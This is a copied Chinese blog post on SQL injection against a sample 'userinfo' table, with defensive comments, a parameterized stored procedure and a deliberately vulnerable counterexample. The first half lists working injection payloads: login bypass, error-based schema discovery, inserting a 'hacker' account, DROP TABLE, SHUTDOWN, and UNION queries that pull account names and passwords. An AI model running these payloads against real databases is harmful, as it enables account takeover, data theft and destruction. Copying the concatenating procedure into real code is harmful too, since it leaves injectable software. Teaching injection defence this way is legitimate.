• SQL注入攻击<收藏>


    --SQL注入攻击
    -- Each statement below is the final query text the server ends up with,
    -- presumably after an application concatenated user input into the quoted
    -- userName / userPwd value. The trailing --' is part of the injected input:
    -- it comments out the closing quote the application appends.
    -- Log in as any user (prevention: pass the values as parameters)
    select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
    select * from  dbo.userinfo where userName=''or 1=1--'
    -- Return every row, not only the one for VINET
    select * from  dbo.userinfo where userID='VINET' OR 1=1
    -- Log in with a known member name (the password check is commented out)
    select * from  dbo.userinfo where userName='admin '--'
    -- Use returned error messages to learn about the table step by step
    -- (prevention: show a custom error page instead of raw database errors)
    select * from  dbo.userinfo where userName=''HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
    -- Insert a row using what the error messages above revealed (succeeded!)
    -- Defence in depth: the application's database login should not hold
    -- rights it does not need, so stacked statements like this one fail.
    select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
    -- Destructive: drop a table
    select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
    -- Read user account information step by step
    -- The last statement returns userPwd values as stored; keeping only salted
    -- password hashes limits what such a leak exposes.
    select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' -- check the column types
    select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' -- obtain the column headings
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' -- obtain all account names
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' -- obtain account passwords

    -- Stop the service (needs sufficient privileges); the same stacked form
    -- covers ;DROP Database D_Name -- and ;DROP TABLE T_Name --
    -- A least-privilege application login cannot run any of these.
    select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
    --


    -- Call the procedure that binds its inputs as sp_executesql parameters,
    -- using ordinary search values.
    exec dbo.SafeQueryCustomers 'l','l'
    -- Call the procedure that concatenates its inputs into the query text.
    -- NOTE(review): presumably meant to show the password argument carrying
    -- the "' or 1=1 --" input; as literal T-SQL the quoting on this line does
    -- not appear to form a valid call - confirm how the page intended it.
    exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

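    CREATE PROCEDURE dbo.SafeQueryCustomers
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        -- Search dbo.userinfo with optional "contains" filters on userName and
        -- userPwd. The WHERE clause is assembled dynamically, but only from
        -- fixed text; the caller's values reach the server as sp_executesql
        -- parameters, so quotes or comment markers in them cannot change the
        -- statement's structure.
        --
        -- @userName  substring to look for in userName; NULL skips the filter
        -- @userPwd   substring to look for in userPwd;  NULL skips the filter
        -- Result set: every column of the matching dbo.userinfo rows.
        --
        -- NOTE(review): %, _ and [ inside the values still act as LIKE
        -- wildcards. They cannot inject SQL, but they widen the match; escape
        -- them in the caller if a literal match is required.
        -- NOTE(review): a substring match on userPwd is a search, not a
        -- credential check - do not use this procedure to authenticate. It also
        -- implies passwords are stored in a comparable form (presumably
        -- plaintext); confirm and prefer salted hashes.
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        -- Patterns are two characters wider than the inputs so that adding the
        -- surrounding '%' cannot truncate a maximum-length value.
        DECLARE @namePattern nvarchar(32)
        DECLARE @pwdPattern nvarchar(14)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''

        IF NOT @userName IS NULL
        BEGIN
           SET @WK = @WK + ' userName LIKE @puserName AND  '
           SET @namePattern = '%' + @userName + '%'
        END

        IF NOT @userPwd IS NULL
        BEGIN
           SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
           SET @pwdPattern = '%' + @userPwd + '%'
        END

        -- Test the filter text, not @STR (which is never empty): with no
        -- filters the SUBSTRING below would receive a negative length.
        IF LEN(@WK) > 0
        BEGIN
           -- LEN ignores trailing spaces, so this drops the final ' AND'.
           SET @STR = @STR + ' WHERE ' + SUBSTRING(@WK, 0, LEN(@WK) - 3)
           -- Both parameters are always declared; one that the statement does
           -- not reference is simply unused.
           EXEC sp_executesql @STR,
                N'@puserName nvarchar(32),@puserPwd nvarchar(14)',
                @puserName = @namePattern, @puserPwd = @pwdPattern
        END
        ELSE
           EXEC sp_executesql @STR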
    =============================================

    CREATE PROCEDURE dbo.SafeQueryCustomers2
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        -- Counterexample to dbo.SafeQueryCustomers: despite its name this
        -- procedure is NOT safe. It pastes @userName and @userPwd directly into
        -- the statement text, so a quote inside either value ends the string
        -- literal and the rest of the value is parsed as SQL. Being a stored
        -- procedure gives no protection once the query is built this way.
        -- Kept to show the contrast; use bound sp_executesql parameters in
        -- real code.
        --
        -- @userName  substring to look for in userName; NULL skips the filter
        -- @userPwd   substring to look for in userPwd;  NULL skips the filter
        -- Result set: every column of the matching dbo.userinfo rows.
        DECLARE @query nvarchar(255), @filters nvarchar(255)
        SELECT @query = 'SELECT * FROM dbo.userinfo', @filters = ''

        -- Vulnerable step: caller-supplied text becomes part of the SQL string.
        IF @userName IS NOT NULL
           SET @filters = @filters + ' userName LIKE ''%' + @userName + '%'' AND  '

        -- Same concatenation flaw for the password filter.
        IF @userPwd IS NOT NULL
           SET @filters = @filters + ' userPwd LIKE ''%' + @userPwd + '%'' AND  '

        -- @query was just assigned a non-empty literal, so this test is always
        -- true and the ELSE branch never runs.
        -- NOTE(review): with both inputs NULL, @filters is empty and SUBSTRING
        -- receives a negative length, which raises an error.
        IF LEN(@query) > 0
        BEGIN
           -- LEN ignores trailing spaces, so this drops the final ' AND'.
           SET @query = @query + ' WHERE ' + SUBSTRING(@filters, 0, LEN(@filters) - 3)
           EXEC sp_executesql @query
        END
        ELSE
           EXEC sp_executesql @query


  • 原文地址:https://www.cnblogs.com/Golf9527/p/1558711.html